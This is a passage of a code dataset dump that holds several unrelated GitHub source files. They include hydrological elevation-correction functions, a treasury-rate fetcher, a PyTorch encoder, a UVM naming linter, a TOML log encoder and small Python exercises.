elevationCorrection\")\n # Tempag = pcr.numpy2pcr(Scalar, Temp, 0.0)\n # aguila(Tempag)\n # Elag = pcr.numpy2pcr(Scalar, elevationCorrection, 0.0)\n # aguila(Elag)\n Temp_cor[Temp_cor < 0.0] = FillVal\n Temp_cor[Temp_cor == 0.0] = FillVal\n Temp_cor[isinf(Temp_cor)] = FillVal\n\n return Temp_cor, Temp\n\n\ndef correctRsin(Rsin, currentdate, radiationCorDir, lat, logger, FillVal):\n \"\"\"\n Calculates daily topographically corrected incoming radiation using clear-sky global, beam and diffuse solar maps outputted from r.sun\n\n :param Rsin:\n :param currentdate:\n :param radiationCorDir:\n :param logger:\n :return: corrected incoming radiation (Rsin) and extraterrestrial radiation (Ra) \n \"\"\"\n\n path = radiationCorDir\n day = currentdate\n flatdir = 'FlatRad_DEMRes'\n topoDEM = 'RadWm2'\n\n # Get daily Extraterrestrial radiation\n rtoa, sunset = Ra_daily(currentdate, lat)\n\n rtoa /= 0.0864 # Convert from MJ day-1 to W m-2 day\n\n # Calculate clearness index (kt) using Ra, adjust with optical path if Kt >= 0.65\n kt = np.maximum(np.minimum(ne.evaluate(\"Rsin/rtoa\"), 1), 0.0001)\n\n # Use Ruiz-Ariaz, 2010b elevation function instead of Opcorr? Or saved Opcorr from hourly algorithm?\n #np.select([kt >= 0.65, kt < 0.65], [Rsin * Opcorr, Rsin])\n\n # Partition radiation into beam and diffuse components for flat surface following Ruiz-Ariaz, 2010b\n # (for hourly not daily solar radiation)\n # kd = np.maximum(0.952 - (1.041 * np.exp(-1 * np.exp(2.300 - 4.702 * kt))), 0.0001)\n\n # Partition daily global radiation into beam and diffuse components for flat surface following Erbs et al., 1982\n #Use different coefficients between Summer, Spring, Fall vs Winter based on sunset hour angle (radians)\n\n # print('sunset angle radians', sunset)\n kd = np.zeros_like(Rsin)\n #Winter\n kd = np.where((sunset < 1.4208) & (kt < 0.715),\n 1.0 - 0.2727 * kt + 2.4495 * np.power(kt, 2) - 11.9514 * np.power(kt, 3) + 9.3879 * np.power(kt, 4), kd)\n kd = np.where((sunset < 1.4208) & (kt >= 0.715),\n 0.143, kd)\n\n #Summer\n kd = np.where((sunset >= 1.4208) & (kt < 0.722),\n 1.0 + 0.2832 * kt - 2.5557 * np.power(kt, 2) + 0.8448 * np.power(kt, 3), kd)\n kd = np.where((sunset >= 1.4208) & (kt >= 0.722),\n 0.175, kd)\n\n Rd_rsky = kd * Rsin\n Rb_rsky = (1-kd) * Rsin\n\n #Calculate clearsky beam and diffuse indices based on gridded data resolution r.sun clearsky beam and diffuse maps\n Rd_clrflat = 'Rdflat_' + day.strftime('%j') + '.tif'\n Rb_clrflat = 'Rbflat_' + day.strftime('%j') + '.tif'\n\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rd_flat, FillVal = readMap((os.path.join(path, flatdir, Rd_clrflat)), 'Gtiff', logger)\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rb_flat, FillVal = readMap((os.path.join(path, flatdir, Rb_clrflat)), 'Gtiff', logger)\n\n # Rb_flat = flipud(Rb_flat.mean(axis=0))\n # Rd_flat = flipud(Rb_flat.mean(axis=0))\n #\n # Rb_flat = resample_grid(Rb_flat, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat, method=\"linear\", FillVal=FillVal)\n # Rd_flat = resample_grid(Rb_flat, ncstepobj.lon, ncstepobj.lat, highResLon, highResLat, method=\"linear\", FillVal=FillVal)\n\n #Calculate Beam and Diffuse clear-sky indices for flat radiation\n Kdif = np.maximum(np.minimum(Rd_rsky / Rd_flat,1),0.0001)\n Kbeam = np.maximum(np.minimum(Rb_rsky / Rb_flat,1),0.0001)\n\n #Read in topographically-adjusted DEM scale clear-sky beam and diffuse radiation\n Rd_clrDEM = 'Rd_' + day.strftime('%j') + '.tif'\n Rb_clrDEM = 'Rb_' + day.strftime('%j') + '.tif'\n\n resX, resY, cols, rows, LinkeLong, LinkeLat, 
Rd_DEM, FillVal = readMap((os.path.join(path, topoDEM, Rd_clrDEM)), 'Gtiff', logger)\n resX, resY, cols, rows, LinkeLong, LinkeLat, Rb_DEM, FillVal = readMap((os.path.join(path, topoDEM, Rb_clrDEM)), 'Gtiff', logger)\n\n logger.info(\"Reading clear-sky daily solar radiation:\")\n\n #Sum and Scale topographically-adjusted clear-sky beam and diffuse components using Kbeam, Kdif clear-sky indices\n\n Rg_DEM = Rd_DEM * Kdif + Rb_DEM * Kbeam\n\n FillVal = 0\n Rg_DEM[Rsin < 0.0] = FillVal\n Rg_DEM[Rsin == 0.0] = 0.00001\n Rg_DEM[isinf(Rsin)] = FillVal\n\n return Rg_DEM, rtoa\n\n\ndef correctPres(relevantDataFields, highResDEM, resLowResDEM, FillVal=1E31):\n \"\"\"\n Correction of air pressure for DEM based altitude correction based on barometric formula\n\n :param relevantDataFields:\n :param Pressure:\n :param highResDEM:\n :param resLowResDEM:\n :return: corrected pressure\n\n relevantDataFields : ['Temperature','DownwellingLongWaveRadiation','SurfaceAtmosphericPressure',\\\n 'NearSurfaceSpecificHumidity','SurfaceIncidentShortwaveRadiation','NearSurfaceWindSpeed']\n \"\"\"\n\n Tmax = relevantDataFields[0]\n Tmin = relevantDataFields[1]\n Tmean = (Tmin + Tmax) / 2\n\n g = 9.801 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n # R = 287 # gas constant per kg air [J kg-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.0065 # lapse rate [K m-1]\n Pressure = 101300 # Atmospheric pressure at sea-level [Pa]\n\n # Why is this, switched off for now...\n # highResDEM = np.maximum(0,highResDEM)\n\n # Pressag = pcr.numpy2pcr(Scalar, Pressure, 0.0)\n # aguila(Pressag)\n\n Pres_corr = np.zeros_like(highResDEM)\n # Incorrect without pressure at METDATA elevation\n # Pres_corr = ne.evaluate(\"Pressure *( (Tmean/ ( Tmean + lapse_rate * (highResDEM))) ** (g * Mo / (R_air * lapse_rate)))\")\n Pres_corr = ne.evaluate(\"101300 *( (293.0 - lapse_rate * (highResDEM)) / 293.0) ** (5.26)\")\n\n Pres_corr[isnan(Pres_corr)] = FillVal\n Pres_corr[isinf(Pres_corr)] = FillVal\n Pres_corr[Pres_corr > 150000] = FillVal\n\n return Pres_corr\n\n\n# @profile\ndef correctQ_RH(relevantDataFields, Tmax, Tmin, highResDEM, resLowResDEM, mismask, FillVal=1E31):\n \"\"\"\n Constant Relative Humidity with elevation using datum specific humidity and temperature\n\n inputs:\n Temperature = daily mean, min or max temperature (degrees Celcius)\n Elevation correction = difference between high resolution and low resolution (4 km) DEM [m]\n\n relevantDataFields : ['MaxTemperature','MinTemperature','NearSurfaceSpecificHumidity',\\\n 'SurfaceIncidentShortwaveRadiation','SurfaceWindSpeed','Pressure','CorrectedSpecificHumidity']\n\n \"\"\"\n\n # constants:\n g = 9.81 # gravitational constant [m s-2]\n R_air = 8.3144621 # specific gas constant for dry air [J mol-1 K-1]\n Mo = 0.0289644 # molecular weight of gas [g / mol]\n lapse_rate = 0.006 # lapse rate [K m-1]\n eps = 0.622 # ratio of water vapour/dry air molecular weights [-]\n FillVal = 1E31\n R = 287.058 # Specific gas constant for dry air [J kg-1 K-1]\n rv = 461 # Specific gas constant for water vapor[J kg-1 K-1]\n eps = 0.622 # ratio of water vapour/dry air molecular weights (R / rv) [-]\n\n Temp_corr = (relevantDataFields[0] + relevantDataFields[1]) / 2\n Pres_corr = relevantDataFields[5]\n Q = relevantDataFields[2]\n # p_mb = relevantDataFields[5] / 1000\n Tmean = (Tmax + Tmin) / 2 # Original Tmean, Tmax without elevation lapse adjustment\n\n # saturation vapour pressure [Pa]\n es_ref = 
ne.evaluate(\"610.8*exp((17.27*(Tmean-273.15))/((Tmean-273.15)+237.3))\")\n es_elev = ne.evaluate(\"610.8*exp((17.27*(Temp_corr-273.15))/((Temp_corr-273.15)+237.3))\")\n es_elev[isinf(es_elev)] = FillVal\n ## tag = pcr.numpy2pcr(Scalar, es_ref, FillVal)\n ## aguila(tag)\n ## tags = pcr.numpy2pcr(Scalar, es_elev, FillVal)\n ## aguila(tags)\n\n # actual vapour pressure [Pa]\n ea_ref = ne.evaluate(\"-(Q*Pres_corr)/((eps-1)*Q-eps)\")\n ea_ref[mismask] = 0.0001\n ea_corr = ne.evaluate(\"(ea_ref / es_ref) * es_elev\") # Set actual vapor pressure equal to reference RH\n ea_corr[isinf(ea_corr)] = 0.0001\n ea_corr[isnan(ea_corr)] = 0.0001\n ea_corr[ea_corr <= 0] = 0.0001\n ea_corr[mismask] = 0.0001\n\n rh_corr = ne.evaluate(\"ea_corr / es_elev\")\n rh_corr[rh_corr < 0.0] = FillVal\n rh_org = ea_ref / es_ref\n\n return es_elev, ea_corr, rh_corr, rh_org\n\n\ndef arid_cor(Tmin, ea, logger):\n # Calculate dew point after correcting for constant RH at elevation for aridity correction\n\n ea_kPa = ea / 1000.0\n Tdew = (np.log(ea_kPa) + 0.49299) / (0.0707 - 0.00421 * np.log(ea_kPa)) # Shuttleworth, 2012 in degrees C; ea in kPA\n Tmin -= 273.15 # Convert from K to degrees C to compare\n\n # Check daily max difference between Tmin minus Tdew\n # Apply aridity correction where Tdew is > 2 degrees C less than Tmin and make Tdew equal to Tmin - 2\n\n # Read in NLCD agricultural areas (NLCD LC 82), NLCD 81 (Hay / Pasture), 90 (Woody Wetlands), 95 (Emergent Herbaceous Wetlands )\n # nlcd_nm_wgs84_AgWetlands_sm.tif (Includes 81, 82, 90, 95), 255 = no class\n path = 'DEM/'\n # NLCDAg_file = 'nlcd_nm_wgs84_Agfields_sm.tif'\n NLCDAg_file = 'nlcd_nm_wgs84_AgWetlands_sm.tif'\n resX, resY, cols, rows, LinkeLong, LinkeLat, NLCDAg, FillVal = readMap((os.path.join(path, NLCDAg_file)), 'Gtiff',\n logger)\n Tmindif = Tmin - Tdew\n\n Tdew_cor = Tdew\n Tdew_cor = where((NLCDAg != 255) & (Tmindif > 2),\n Tmin - 2.0, Tdew)\n\n ea_kPa_cor = 0.6108 * np.exp(17.27 * Tdew_cor / (Tdew_cor + 237.3)) # (ASCE, 2005): ea in kPa, ASCE in degrees C\n ea_cor = ea_kPa * 1000 # Convert kPa to Pa\n\n # Save Tdew correction difference to verify working\n Tdew_diff = Tmin - Tdew_cor\n\n return ea_cor, Tdew_diff\n\n\ndef Ra_daily(currentdate, lat):\n # CALCULATE EXTRATERRESTRIAL RADIATION\n # get day of year\n tt = currentdate.timetuple()\n JULDAY = tt.tm_yday\n # #Latitude radians\n LatRad = ne.evaluate(\"lat*pi/180.0\")\n # declination (rad)\n declin = ne.evaluate(\"0.4093*(sin(((2.0*pi*JULDAY)/365.0)-1.39))\")\n\n # sunset hour angle\n # arccosInput = ne.evaluate(\"-1*(tan(LatRad))*(tan(declin))\")\n arccosInput = -1 * (np.tan(LatRad)) * np.tan(declin)\n arccosInput = np.minimum(1, arccosInput)\n arccosInput = np.maximum(-1, arccosInput)\n sunangle = ne.evaluate(\"arccos(arccosInput)\") #Sunset hour angle (rads)\n # # distance of earth to sun\n distsun = ne.evaluate(\"1+0.033*(cos((2*pi*JULDAY)/365.0))\")\n # Ra = water equivalent extra terrestiral radiation in MJ day-1\n rtoa = ne.evaluate(\"((24 * 60 * 0.082) / 3.14) * distsun * (sunangle*(sin(LatRad))*(sin(declin))+(cos(LatRad))*(cos(declin))*(sin(sunangle)))\")\n rtoa[rtoa < 0] = 0\n # Raag = numpy2pcr(Scalar, Ra, 0.0)\n # aguila(Raag)\n\n return rtoa, sunangle\n","repo_name":"NMTHydro/RefET","sub_path":"gadget_lib.py","file_name":"gadget_lib.py","file_ext":"py","file_size_in_byte":27956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"10516243548","text":"\"\"\"\nGet economic data and store to local json file.\n\"\"\"\n# %% 
codecell\n############################################################\nimport os\nimport json\nfrom json import JSONDecodeError\nfrom io import StringIO, BytesIO\nimport glob\nimport importlib\nimport sys\nimport cProfile\n\nimport os.path\n\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\nimport datetime\nfrom datetime import date, timedelta, time\n\nfrom yahoofinancials import YahooFinancials\n\ntry:\n from scripts.dev.data_collect.options import DerivativeExpirations, DerivativesHelper\n from scripts.dev.multiuse.help_class import baseDir, dataTypes, getDate, write_to_parquet\n\nexcept ModuleNotFoundError:\n from data_collect.options import DerivativesHelper, DerivativesStats\n from multiuse.help_class import baseDir, dataTypes, getDate, write_to_parquet\n\n importlib.reload(sys.modules['data_collect.options'])\n importlib.reload(sys.modules['multiuse.help_class'])\n\n from data_collect.options import DerivativesHelper, DerivativesStats\n from multiuse.help_class import baseDir, dataTypes, getDate\n\n# %% codecell\n############################################################\n\"\"\"\nGet the last year of 3-month T bill rates (risk free).\nWrite function to find the most recent date and then get all data in\nbetween today and that day.\n\"\"\"\n# %% codecell\n############################################################\n\nclass yahooTbills():\n \"\"\"Get current price for US T-bills - 3 month, 5 yr, 10 yr, 30 yr.\"\"\"\n # 4 am to 8 pm, every hour\n tickers = ['^IRX', '^FVX', '^TNX', '^TYX']\n # cols = ['3mo', '5yr', '10yr', '30yr', 'time']\n\n def __init__(self):\n self.get_path(self)\n self.df = self.get_data(self)\n self.write_to_parquet(self)\n\n def get_path(cls, self):\n \"\"\"Get local fpath.\"\"\"\n self.fpath = f\"{baseDir().path}/economic_data/treasuries.parquet\"\n # Create an empty data frame with column names\n df = pd.DataFrame(columns=self.tickers)\n # Check if local data frame already exists\n if os.path.isfile(self.fpath):\n df = pd.read_parquet(self.fpath)\n # Return data frame\n self.df = df\n\n def get_data(cls, self):\n \"\"\"Get data from yahoo finance.\"\"\"\n treasuries = YahooFinancials(self.tickers)\n tdata = treasuries.get_current_price()\n\n # Add current timestamp\n tdata['time'] = datetime.datetime.now()\n # Append data to existing data frame\n df = self.df.append(tdata, ignore_index=True)\n\n \"\"\"\n # Remove time from columns for data conversion\n try:\n self.cols.remove('time')\n except ValueError:\n pass\n # Convert cols to float 16s\n df[self.cols] = df[self.cols].astype(np.float16)\n \"\"\"\n df.reset_index(inplace=True, drop=True)\n\n return df\n\n def write_to_parquet(cls, self):\n \"\"\"Write data to local json file.\"\"\"\n write_to_parquet(self.df, self.fpath)\n\n\n# %% codecell\n############################################################\n\n\ndef get_tdata(payload, base_url):\n \"\"\"Get tdata from IEX with specified range.\"\"\"\n # 3 month risk free rate\n symbol = \"DGS3MO\"\n tdata = requests.get(\n f\"{base_url}/time-series/treasury/{symbol}\",\n params=payload # Passed through function arg\n )\n print(f\"Trying to get new data with the parameters {payload}\")\n new_tdata = pd.json_normalize(json.loads(tdata.content))\n new_tdata['dt_date'] = pd.to_datetime(new_tdata['date'], unit='ms')\n return new_tdata\n\n\ndef read_tdata():\n \"\"\"Read local data or get if not available.\"\"\"\n load_dotenv()\n base_url = os.environ.get(\"base_url\")\n\n # Load base_directory 
(derivatives data)\n base_dir = f\"{Path(os.getcwd()).parents[0]}/data/economic_data\"\n choices = glob.glob(f\"{base_dir}/*\")\n fname = f\"{base_dir}/risk_free_daily.parquet\"\n\n if fname in choices: # If file is saved locally\n tdata_df = pd.read_parquet(fname)\n\n # Most recent date in local data\n try:\n mr_date = tdata_df['dt_date'].max().date()\n except AttributeError:\n mr_date = pd.to_datetime(tdata_df['dt_date'], unit='ms').max().date()\n # Most recent available date to get data from\n mr_avail_date = DerivativesHelper.which_fname_date()\n\n # If there is new data available, get it\n if mr_date < mr_avail_date:\n print('Most recent date is less that the most recent available date')\n # Define the payload to be used\n payload = {'token': os.environ.get(\"iex_publish_api\"),\n 'from': mr_date.strftime(\"%Y-%m-%d\"), # YYYY-MM-DD\n 'to': mr_avail_date.strftime(\"%Y-%m-%d\")} # YYYY-MM-DD\n # Get tdata from IEX cloud\n new_tdata = get_tdata(payload, base_url)\n # Combine new and old data\n tdata_df = pd.concat([tdata_df, new_tdata])\n # Reset index and drop\n tdata_df.reset_index(drop=True, inplace=True)\n # Write to local json file\n write_to_parquet(tdata_df, fname)\n\n else: # If no data is saved locally, get the ytd data\n # Define the payload and range\n payload = {'token': os.environ.get(\"iex_publish_api\"), 'range': 'ytd'}\n # Get tdata from IEX cloud\n print('local data does not exist')\n tdata_df = get_tdata(payload, base_url)\n # Write to local json file\n write_to_parquet(tdata_df, fname)\n\n return tdata_df\n","repo_name":"webclinic017/algotrading-20","sub_path":"data_collect/yahoo_treasuries.py","file_name":"yahoo_treasuries.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37305447828","text":"import torch.nn as nn\nimport numpy as np\nimport os\nimport sys\nfrom modules import Conv, Dense\n\n\nclass Encoder(nn.Module):\n def __init__(self, in_dim, hid_dim, enc_dim):\n super().__init__()\n self.conv_pre = Conv(layers=2, stride=1, kernel=3, hid_dim = hid_dim, in_dim=in_dim)\n self.conv_strided = Conv(layers=1, stride=2, kernel=4, hid_dim = hid_dim, residual=False)\n self.conv_post = Conv(layers=2, stride=1, kernel=3, hid_dim = hid_dim)\n self.dense = Dense(layers=4, hid_dim=hid_dim)\n self.out = nn.Linear(in_features=hid_dim, out_features=enc_dim)\n\n def forward(self, x):\n x = self.conv_pre(x)\n #print(\"Before stride:\",x.shape)\n x = self.conv_strided(x)\n #print(\"After stride:\",x.shape)\n x = self.conv_post(x)\n #print(\"Conv after stride:\", x.shape)\n x = x.permute(0,2,1)\n x = self.dense(x)\n x = self.out(x)\n out = x.permute(0, 2, 1)\n #print(\"output shape:\", out.shape)\n return out","repo_name":"anuragkumar95/VQ-VAE-ASR","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6992236029","text":"from src.utils.arcnah import arcno\nimport pandas as pd\nfrom src.projects.dima.tabletools import fix_fields\nimport platform\n\ndef lpi_pk(dimapath):\n \"\"\"\n returns a dataframe with tblplots, tbllines, tbllpiheader and tblLPIDetail\n joined. 
PrimaryKey field is made using formdate and plotkey\n\n \"\"\"\n\n lpi_header = arcno.MakeTableView('tblLPIHeader', dimapath)\n lpi_detail = arcno.MakeTableView('tblLPIDetail', dimapath)\n lines = arcno.MakeTableView('tblLines', dimapath)\n plots = arcno.MakeTableView('tblPlots', dimapath)\n\n # joins\n\n plot_line = pd.merge(plots, lines, how=\"inner\", on=\"PlotKey\")\n plot_line.LineKey\n lpihead_detail = pd.merge(lpi_header, lpi_detail, how=\"inner\", on=\"RecKey\")\n len(lpihead_detail.PointLoc.unique())\n\n plot_line_det = pd.merge(plot_line, lpihead_detail, how=\"inner\", on=\"LineKey\")\n plot_line_det.loc[:,['FormDate',\"RecKey\", \"LineKey\"]]\n arc = arcno()\n #\n # tmp1 = fix_fields(plot_line_det, 'DateModified').copy()\n # tmp2 = fix_fields(tmp1,'ElevationType').copy()\n plot_line_det.FormDate = pd.to_datetime(plot_line_det.FormDate) if platform.system()=='Linux' else plot_line_det.FormDate\n plot_pk = arc.CalculateField(plot_line_det, \"PrimaryKey\", \"PlotKey\", \"FormDate\")\n # plot_pk.drop_duplicates([\"PrimaryKey\", \"PlotKey\", \"FormDate\"])\n\n return plot_pk\n","repo_name":"krstphrrr/ingesterv2","sub_path":"src/projects/dima/tables/lpipk.py","file_name":"lpipk.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40847688421","text":"import sys\nfrom itertools import combinations\n\nN, M = map(int, sys.stdin.readline().split())\ncity = [list(map(int, sys.stdin.readline().strip().split()))\n for _ in range(N)]\n\ndef distance(y1, x1, y2, x2):\n return abs(y1-y2)+abs(x1-x2)\n\n# 집과 치킨집의 좌표를 저장\nhomes = []\nchickens = []\nfor i in range(N):\n for j in range(N):\n if city[i][j] == 1:\n homes.append((i, j))\n elif city[i][j] == 2:\n chickens.append((i, j))\n\n# 모든 집과 모든 치킨집 사이의 거리 구하기\nd = [[] for _ in range(len(homes))]\nfor idx, home in enumerate(homes):\n for chicken in chickens:\n d[idx].append(distance(*home, *chicken))\n\n\n# 치킨집 M개를 골랐을 때 각각의 거리의 합을 구하고 최소값을 저장\nMIN = 10**9\ncombis = combinations(range(len(chickens)), M)\nfor combi in combis:\n sum_ = 0\n tmp = [[] for _ in range(len(homes))]\n for i in range(len(homes)): # 모든 집에 대해 갱신\n tmp[i] = [d[i][j] for j in combi]\n min_ = [0] * len(homes)\n for i in range(len(homes)):\n min_[i] = min(tmp[i])\n \n sum_ = sum(min_)\n if sum_ < MIN:\n MIN = sum_\n\nprint(MIN)\n''' [review]\n설계:\nN, M이 그리 크지 않아서 브루트 포스로 풀릴듯?\n모든 집에 대해 각각의 치킨집 까지의 거리를 구하고\n치킨집 M개를 골랐을 때 거리의 합을 구하자.\n\n방법 1. 거리를 모두 구하고 치킨집을 선택해서 합 구하기\n방법 2. 
치킨집 선택해서 거리를 구하고 합 구하기\n\n나는 방법 1로 했음.\n방법 2로 하는 경우 치킨집을 선택할 ��마다 거리를 다시 구해야해서\n시간 복잡도가 커짐.\n'''","repo_name":"euroversedev/BaekJoonOJ_Python","sub_path":"Implementation/15686.py","file_name":"15686.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72195599127","text":"import pathlib\nimport typing\nfrom functools import partial\n\nimport toml\n\nfrom fate.util.lazy import lstr\n\n\nclass TomlStrValue:\n\n _as_str_ = ()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dump_funcs.update(self._dump_funcs_str_)\n\n @property\n def _dump_funcs_str_(self):\n return dict.fromkeys(self._as_str_, self._value_as_str_)\n\n def _value_as_str_(self, value):\n return self.dump_funcs[str](str(value))\n\n\nclass TomlTerse:\n\n class InlineTableFormatters(typing.NamedTuple):\n\n sep: typing.Iterable[str] = (', ', ' = ')\n close: typing.Iterable[str] = ('{ ', ' }')\n end: str = '\\n'\n\n def dump_inline_table_formatted(self, section,\n formatters=InlineTableFormatters(),\n recursive_formatters=None):\n \"\"\"Preserve inline table in its compact syntax instead of expanding\n into subsection.\n\n https://github.com/toml-lang/toml#user-content-inline-table\n\n Unlike the built-in `dump_inline_table`, seperators may be\n customized, for example to omit superfluous whitespace.\n\n Also unlike the built-in, keys are cast to str, rather than\n presumed to be this type.\n\n By default, configured formatting is not applied to nested\n dictionaries; these are dumped with formatting compatible to\n that of the built-in method (*not* specially \"formatted\").\n Specify argument `recursive_formatters=True` to apply formatting\n configured by `formatters` to nested dictionaries as well; or,\n use `recursive_formatters` to specify an alternative set of\n formatters.\n\n \"\"\"\n if not isinstance(section, dict):\n return str(self.dump_value(section))\n\n (\n (sep_item, sep_pair),\n (close0, close1),\n end,\n ) = formatters\n\n if hasattr(recursive_formatters, '__iter__'):\n dump_value = partial(self.dump_inline_table_formatted,\n formatters=recursive_formatters,\n recursive_formatters=True)\n elif recursive_formatters:\n dump_value = partial(self.dump_inline_table_formatted,\n formatters=formatters,\n recursive_formatters=True)\n else:\n dump_value = self.dump_inline_table_formatted\n\n values = (\n str(key) + sep_pair + dump_value(val)\n for (key, val) in section.items()\n )\n return close0 + sep_item.join(values) + close1 + end\n\n\nclass TomlLoggingEncoder(TomlTerse, TomlStrValue, toml.TomlEncoder):\n\n _as_str_ = (lstr, pathlib.PosixPath)\n\n\ntoml_logging_encoder = TomlLoggingEncoder()\n\ninline_formatters_terse = TomlLoggingEncoder.InlineTableFormatters(sep=(' ', '='),\n close=('', ''),\n end='')\n\nnested_formatters_terse = TomlLoggingEncoder.InlineTableFormatters(sep=(' ', '='),\n close=('{', '}'),\n end='')\n\n\ndef dump_structured_log_record(struct):\n return toml_logging_encoder.dump_inline_table_formatted(\n struct,\n inline_formatters_terse,\n nested_formatters_terse,\n )\n","repo_name":"internet-equity/fate","sub_path":"src/fate/util/log/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20707943387","text":"\"\"\"Derived class naming schema\n\n\"\"\"\n# Python Imports\nimport os\nimport re\n# Lintwork Imports\n# Draconian UVM 
imports\nfrom duvm import filters\n\n\nclass ClassnameSchema(filters.LineListener):\n \"\"\"Check for the naming of class should match with derived class\n UVM components/objects hash table for naming schema\n \"\"\"\n\n subscribe_to = [filters.BeginClassBroadcaster]\n\n scopedname_re = re.compile(r\"pkg::\\s*([^ \\#]+)\")\n baseclassname_re = re.compile(r\".*(base|top)_(.*)\")\n\n schema_dict = {\n \"uvm_env\": \"env_c\",\n \"uvm_agent\": \"agent_c\",\n \"uvm_monitor\": \"mon_c\",\n \"uvm_scoreboard\": \"sb_c\",\n \"uvm_sequence_item\": \"item_c\",\n \"uvm_sequencer\": \"sqr_c\",\n \"uvm_driver\": \"drv_c\",\n \"uvm_sequence\": \"seq_c\",\n \"uvm_sequence_base\": \"seq_c\",\n \"uvm_component\": None,\n \"uvm_object\": None,\n \"uvm_reg_adapter\": \"reg_adapter_c\",\n \"uvm_reg_block\": \"reg_block_c\",\n \"uvm_reg_cbs\": \"cb_c\"\n }\n\n def update_beginclass(self, line_no, line, match):\n derived_classname = match.group('name')\n base_classname = match.group('base')\n if base_classname in self.schema_dict:\n if self.schema_dict[base_classname] == None:\n return\n if not derived_classname.endswith(self.schema_dict[base_classname]):\n self.error(\n line_no, line,\n \"Derived class '{}' not ending with '{}'. Recommend using suffix '{}' as derived class for base class '{}'\"\n .format(derived_classname, self.schema_dict[base_classname], self.schema_dict[base_classname],\n base_classname))\n else:\n baseclassname_match = self.baseclassname_re.search(base_classname)\n if baseclassname_match:\n base_classname = baseclassname_match.group(2)\n\n scopename_match = self.scopedname_re.search(base_classname)\n if scopename_match:\n base_classname = scopename_match.group(1)\n\n if not derived_classname.endswith(base_classname):\n self.error(\n line_no, line,\n \"Derived class '{}' not ending with '{}'. Recommend using suffix '{}' as derived class for base class '{}'\"\n .format(derived_classname, base_classname, base_classname, base_classname))\n","repo_name":"Lightelligence/draconian_uvm","sub_path":"duvm/classname_schema.py","file_name":"classname_schema.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36062487596","text":"import random\n\n# note that while range is exclusive, randint is inclusive\nrandom_number = random.randint(1, 10)\n\n# if the player guesses correctly, tell them they won\n# otherwise, tell them if they are too high or too low\n\nuser_number = int(input(\"Please guess a number \"))\n\nwhile random_number != user_number:\n\tif random_number < user_number:\n\t\tprint(\"You guessed too high!\")\n\t\tuser_number = int(input(\"Please guess a number from 1 and 10 \"))\n\telse:\n\t\tprint(\"You guessed too low!\")\n\t\tuser_number = int(input(\"Please guess a number \"))\nprint(\"You won!\")\nuser_input = input(\"Would you like to play again? 
Enter y or n: \")\nif user_input == \"y\":\n\tuser_number = int(input(\"Please guess a number from 1 to 10 \"))","repo_name":"falondarville/python-exercises","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44246853120","text":"\n\"\"\"Escreva 3 programas em Python que resolva o seguinte problema:\nDado um vetor A de tamanho N com apenas números inteiros positivos, calcule o fatorial de cada um deles e armazene o resultado em um vetor B.\n\nPara calcular o fatorial, utilize a seguinte função:\n\n\n def fatorial(n):\n fat = n\n for i in range(n-1,1,-1):\n fat = fat * i\n return(fat)\n\n\nOs modos de desenvolver seu programa devem ser:\n\nsequencialmente (sem concorrência);\nusando o módulo threading com 4 threads;\nusando o módulo multiprocessing com 4 processos.\"\"\"\n\nimport sys\nimport time\nimport threading\nimport threading,time\n\nvector = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nvector_result = []\n\ndef factorial(n):\n fat = n\n for i in range(n-1,1,-1):\n fat = fat * i\n return(fat)\n\ndef append_threading(vector, factorial,vector_result):\n for n in vector:\n vector_result.append(factorial(n))\n\ndef main():\n try:\n size = len(vector)\n\n thread_0 = threading.Thread(target=append_threading, args=(vector[0:int(size/4)], factorial, vector_result))\n thread_0.start()\n\n thread_1 = threading.Thread(target=append_threading, args=(vector[int(size/4):int(size/3)], factorial, vector_result))\n thread_1.start()\n\n thread_2 = threading.Thread(target=append_threading, args=(vector[int(size/3):int(size/2)], factorial, vector_result))\n thread_2.start()\n\n thread_3 = threading.Thread(target=append_threading, args=(vector[int(size/2):size], factorial, vector_result))\n thread_3.start()\n\n thread_0.join()\n thread_1.join()\n thread_3.join()\n thread_3.join()\n\n print(\"Calculating factorials 4 threads...\")\n print(\"Original vector: {}\".format(vector))\n print(\"Factorial vector: {}\".format(vector_result))\n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"msmagnanijr/edc-python","sub_path":"desenvolvimento_python_sistemas_operacionais_redes/at/exercise_08_b_threads.py","file_name":"exercise_08_b_threads.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17893073756","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nwith open(\"VERSION\", \"r\", encoding=\"utf-8\") as fh:\n version = fh.read()\n\nsetuptools.setup(\n name=\"lazyprint\",\n version=version,\n author=\"Hugo Viana\",\n 